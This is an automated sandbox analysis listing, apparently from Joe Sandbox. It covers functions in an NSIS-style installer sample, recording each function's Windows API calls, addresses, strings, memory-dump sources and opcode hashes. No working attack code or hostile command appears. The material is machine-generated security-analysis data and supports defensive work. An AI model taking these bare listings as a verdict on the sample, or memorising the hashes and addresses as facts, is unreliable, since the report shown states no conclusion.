                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                          • API String ID: 3734993849-2769509956
                                                                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2320649405-0
                                                                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                          Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                          Strings
                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                          • API String ID: 1033533793-945480824
                                                                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                          Strings
                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                          • String ID: f
                                                                                                          • API String ID: 41195575-1993550816
                                                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                          • MulDiv.KERNEL32(0002BE00,00000064,?), ref: 00403295
                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                          Strings
                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                          • String ID: verifying installer: %d%%
                                                                                                          • API String ID: 1451636040-82062127
                                                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                          • wsprintfW.USER32 ref: 00404457
                                                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                          • String ID: %u.%u%s%s$@rD
                                                                                                          • API String ID: 3540041739-1813061909
                                                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$Prev
                                                                                                          • String ID: *?|<>/":
                                                                                                          • API String ID: 589700163-165019052
                                                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1912718029-0
                                                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1849352358-0
                                                                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Timeout
                                                                                                          • String ID: !
                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
